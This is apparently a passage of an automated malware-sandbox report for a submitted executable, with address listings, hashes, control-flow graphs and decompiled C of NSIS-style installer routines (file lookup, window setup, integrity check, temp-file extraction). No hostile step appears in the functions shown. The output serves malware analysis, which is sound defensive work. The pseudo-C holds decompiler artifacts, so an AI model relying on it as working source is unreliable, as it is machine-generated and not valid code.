                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x00000000
                                                  0x00406964
                                                  0x00406962
                                                  0x00406b97
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                  • Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
                                                  • Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                  • Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 627 405ff6-40600a FindFirstFileA 628 406017 627->628 629 40600c-406015 FindClose 627->629 630 406019-40601a 628->630 629->630
                                                  C-Code - Quality: 100%
                                                  			E00405FF6(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225d0;
			}




                                                  0x00406001
                                                  0x0040600a
                                                  0x00000000
                                                  0x00406017
                                                  0x0040600d
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00406001
                                                  • FindClose.KERNEL32(00000000), ref: 0040600D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\
                                                  • API String ID: 2295610775-3404278061
                                                  • Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                  • Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
                                                  • Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                  • Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 40374e-403766 call 406087 137 403768-403778 call 405c59 134->137 138 40377a-4037a1 call 405be2 134->138 147 4037c4-4037ed call 403a17 call 4058cf 137->147 143 4037a3-4037b4 call 405be2 138->143 144 4037b9-4037bf lstrcatA 138->144 143->144 144->147 152 4037f3-4037f8 147->152 153 403874-40387c call 4058cf 147->153 152->153 154 4037fa-40381e call 405be2 152->154 159 40388a-4038af LoadImageA 153->159 160 40387e-403885 call 405d1d 153->160 154->153 161 403820-403822 154->161 163 4038b5-4038eb RegisterClassA 159->163 164 40393e-403946 call 40140b 159->164 160->159 165 403833-40383f lstrlenA 161->165 166 403824-403831 call 405819 161->166 167 4038f1-403939 SystemParametersInfoA CreateWindowExA 163->167 168 403a0d 163->168 177 403950-40395b call 403a17 164->177 178 403948-40394b 164->178 172 403841-40384f lstrcmpiA 165->172 173 403867-40386f call 4057ee call 405cfb 165->173 166->165 167->164 171 403a0f-403a16 168->171 172->173 176 403851-40385b GetFileAttributesA 172->176 173->153 180 403861-403862 call 405835 176->180 181 40385d-40385f 176->181 187 403961-40397b ShowWindow call 40601d 177->187 188 4039e4-4039ec call 4050b9 177->188 178->171 180->173 181->173 181->180 193 403987-403999 GetClassInfoA 187->193 194 40397d-403982 call 40601d 187->194 195 403a06-403a08 call 40140b 188->195 196 4039ee-4039f4 188->196 200 4039b1-4039e2 DialogBoxParamA call 40140b call 40369e 193->200 201 40399b-4039ab GetClassInfoA RegisterClassA 193->201 194->193 195->168 196->178 197 4039fa-403a01 call 40140b 196->197 197->178 200->171 201->200
                                                  C-Code - Quality: 96%
                                                  			E0040374E(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f90;
				_t20 = E00406087(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420580;
					"1033" = 0x7830;
					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
					__eflags =  *0x420580;
					if(__eflags == 0) {
						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C59("1033",  *_t20() & 0x0000ffff);
				}
				E00403A17(_t76, _t88);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x424000 =  *0x423f98 & 0x00000020;
				 *0x42401c = 0x10000;
				if(E004058CF(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004058CF(_t96, _t84) == 0) {
						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423768 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A17(_t76, __eflags);
							__eflags =  *0x424020;
							if( *0x424020 != 0) {
								_t31 = E004050B9(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42374c;
								if( *0x42374c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420558, 5);
							_t37 = E0040601D("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E0040601D("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423720);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423720);
								 *0x423744 = _t85;
								RegisterClassA(0x423720);
							}
							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
							E0040369E(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f80;
						 *0x423734 = _t28;
						_v20 = 0x624e5f;
						 *0x423724 = E00401000;
						 *0x423730 =  *0x423f80;
						 *0x423744 =  &_v20;
						if(RegisterClassA(0x423720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422f20;
					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
					_t62 =  *0x422f20; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422f21;
						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405CFB(_t84, E004057EE(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405835(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                  0x00403754
                                                  0x0040375d
                                                  0x00403764
                                                  0x00403766
                                                  0x0040377a
                                                  0x0040378c
                                                  0x00403796
                                                  0x0040379b
                                                  0x004037a1
                                                  0x004037b4
                                                  0x004037b4
                                                  0x004037bf
                                                  0x00403768
                                                  0x00403773
                                                  0x00403773
                                                  0x004037c4
                                                  0x004037ce
                                                  0x004037d7
                                                  0x004037dc
                                                  0x004037ed
                                                  0x00403874
                                                  0x0040387c
                                                  0x00403885
                                                  0x00403885
                                                  0x0040389b
                                                  0x004038a1
                                                  0x004038af
                                                  0x0040393e
                                                  0x00403946
                                                  0x00403950
                                                  0x00403955
                                                  0x0040395b
                                                  0x004039e5
                                                  0x004039ea
                                                  0x004039ec
                                                  0x00403a08
                                                  0x00000000
                                                  0x00403a08
                                                  0x004039ee
                                                  0x004039f4
                                                  0x004039fc
                                                  0x004039fc
                                                  0x00000000
                                                  0x004039f4
                                                  0x00403969
                                                  0x00403974
                                                  0x00403979
                                                  0x0040397b
                                                  0x00403982
                                                  0x00403982
                                                  0x0040398d
                                                  0x00403995
                                                  0x00403997
                                                  0x00403999
                                                  0x004039a2
                                                  0x004039a5
                                                  0x004039ab
                                                  0x004039ab
                                                  0x004039ca
                                                  0x004039db
                                                  0x00000000
                                                  0x004039e0
                                                  0x00403948
                                                  0x0040394a
                                                  0x00000000
                                                  0x004038b5
                                                  0x004038b5
                                                  0x004038bb
                                                  0x004038c5
                                                  0x004038cd
                                                  0x004038d7
                                                  0x004038dd
                                                  0x004038eb
                                                  0x00403a0d
                                                  0x00403a0d
                                                  0x00000000
                                                  0x00403a0d
                                                  0x004038f1
                                                  0x004038fa
                                                  0x00403939
                                                  0x00000000
                                                  0x00403939
                                                  0x004037f3
                                                  0x004037f3
                                                  0x004037f8
                                                  0x00000000
                                                  0x00000000
                                                  0x00403802
                                                  0x00403812
                                                  0x00403817
                                                  0x0040381e
                                                  0x00000000
                                                  0x00000000
                                                  0x00403822
                                                  0x00403824
                                                  0x00403831
                                                  0x00403831
                                                  0x00403839
                                                  0x0040383f
                                                  0x00403867
                                                  0x0040386f
                                                  0x00000000
                                                  0x00403851
                                                  0x00403852
                                                  0x0040385b
                                                  0x00403861
                                                  0x00403862
                                                  0x00000000
                                                  0x00403862
                                                  0x0040385d
                                                  0x0040385f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040385f
                                                  0x0040383f

                                                  APIs
                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                  • lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000), ref: 004037BF
                                                  • lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                                                  • lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
                                                  • GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
                                                  • LoadImageA.USER32 ref: 0040389B
                                                    • Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66
                                                  • RegisterClassA.USER32 ref: 004038E2
                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
                                                  • CreateWindowExA.USER32 ref: 00403933
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                  • GetClassInfoA.USER32 ref: 00403995
                                                  • GetClassInfoA.USER32 ref: 004039A2
                                                  • RegisterClassA.USER32 ref: 004039AB
                                                  • DialogBoxParamA.USER32 ref: 004039CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\Lc8xQv8iZY.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-2594716311
                                                  • Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                  • Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
                                                  • Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                  • Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 208 402c88-402cd6 GetTickCount GetModuleFileNameA call 4059d2 211 402ce2-402d10 call 405cfb call 405835 call 405cfb GetFileSize 208->211 212 402cd8-402cdd 208->212 220 402e00-402e0e call 402be9 211->220 221 402d16-402d2d 211->221 213 402f27-402f2b 212->213 228 402e14-402e17 220->228 229 402edf-402ee4 220->229 223 402d31-402d37 call 4031d5 221->223 224 402d2f 221->224 227 402d3c-402d3e 223->227 224->223 230 402d44-402d4a 227->230 231 402e9b-402ea3 call 402be9 227->231 232 402e43-402e8f GlobalAlloc call 406164 call 405a01 CreateFileA 228->232 233 402e19-402e31 call 403207 call 4031d5 228->233 229->213 234 402dca-402dce 230->234 235 402d4c-402d64 call 405993 230->235 231->229 259 402e91-402e96 232->259 260 402ea5-402ed5 call 403207 call 402f2e 232->260 233->229 256 402e37-402e3d 233->256 243 402dd0-402dd6 call 402be9 234->243 244 402dd7-402ddd 234->244 235->244 253 402d66-402d6d 235->253 243->244 246 402df0-402dfa 244->246 247 402ddf-402ded call 4060f6 244->247 246->220 246->221 247->246 253->244 258 402d6f-402d76 253->258 256->229 256->232 258->244 261 402d78-402d7f 258->261 259->213 268 402eda-402edd 260->268 261->244 263 402d81-402d88 261->263 263->244 265 402d8a-402daa 263->265 265->229 267 402db0-402db4 265->267 269 402db6-402dba 267->269 270 402dbc-402dc4 267->270 268->229 271 402ee6-402ef7 268->271 269->220 269->270 270->244 274 402dc6-402dc8 270->274 272 402ef9 271->272 273 402eff-402f04 271->273 272->273 275 402f05-402f0b 273->275 274->244 275->275 276 402f0d-402f25 call 405993 275->276 276->213
                                                  C-Code - Quality: 96%
                                                  			E00402C88(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423f8c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe", 0x400);
				_t105 = E004059D2("C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CFB("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe");
				E00405CFB(0x42c000, E00405835("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f130 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BE9(1);
					if( *0x423f94 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406164(0x40b098);
						E00405A01( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403207( *0x423f94 + 0x1c);
							 *0x41f134 = _t65;
							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423f90 = _t110;
								 *0x423f98 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423f9c =  *0x423f9c + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417124; // 0x505a9
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405993(0x423fa0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403207( *0x417120);
					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031D5(0x417130, _t106); // executed
						if(_t83 == 0) {
							E00402BE9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f94 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BE9(0);
							}
							goto L19;
						}
						E00405993( &_v40, 0x417130, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417120; // 0x199ed
							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423f94 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f130) {
							_v8 = E004060F6(_v8, 0x417130, _t106);
						}
						 *0x417120 =  *0x417120 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                  0x00402c96
                                                  0x00402c99
                                                  0x00402cb3
                                                  0x00402cb8
                                                  0x00402ccb
                                                  0x00402cd0
                                                  0x00402cd6
                                                  0x00000000
                                                  0x00402cd8
                                                  0x00402ce9
                                                  0x00402cfa
                                                  0x00402d01
                                                  0x00402d09
                                                  0x00402d0e
                                                  0x00402d10
                                                  0x00402e00
                                                  0x00402e02
                                                  0x00402e0e
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e17
                                                  0x00402e43
                                                  0x00402e48
                                                  0x00402e53
                                                  0x00402e55
                                                  0x00402e66
                                                  0x00402e81
                                                  0x00402e8a
                                                  0x00402e8f
                                                  0x00402eae
                                                  0x00402ebe
                                                  0x00402ed0
                                                  0x00402ed5
                                                  0x00402edd
                                                  0x00402eea
                                                  0x00402ef2
                                                  0x00402ef7
                                                  0x00402ef9
                                                  0x00402ef9
                                                  0x00402f01
                                                  0x00402f01
                                                  0x00402f04
                                                  0x00402f05
                                                  0x00402f05
                                                  0x00402f08
                                                  0x00402f0a
                                                  0x00402f0a
                                                  0x00402f0d
                                                  0x00402f14
                                                  0x00402f20
                                                  0x00000000
                                                  0x00402f25
                                                  0x00000000
                                                  0x00402edd
                                                  0x00000000
                                                  0x00402e91
                                                  0x00402e1f
                                                  0x00402e31
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d16
                                                  0x00402d16
                                                  0x00402d1b
                                                  0x00402d1f
                                                  0x00402d26
                                                  0x00402d2d
                                                  0x00402d2f
                                                  0x00402d2f
                                                  0x00402d37
                                                  0x00402d3e
                                                  0x00402e9d
                                                  0x00402edf
                                                  0x00000000
                                                  0x00402edf
                                                  0x00402d4a
                                                  0x00402dce
                                                  0x00402dd1
                                                  0x00402dd6
                                                  0x00000000
                                                  0x00402dce
                                                  0x00402d57
                                                  0x00402d5c
                                                  0x00402d64
                                                  0x00402d8a
                                                  0x00402d90
                                                  0x00402d99
                                                  0x00402d9f
                                                  0x00402da4
                                                  0x00402daa
                                                  0x00000000
                                                  0x00000000
                                                  0x00402db4
                                                  0x00402dbc
                                                  0x00402dbf
                                                  0x00402dc4
                                                  0x00402dc6
                                                  0x00402dc6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402db4
                                                  0x00402dd7
                                                  0x00402ddd
                                                  0x00402ded
                                                  0x00402ded
                                                  0x00402df0
                                                  0x00402df6
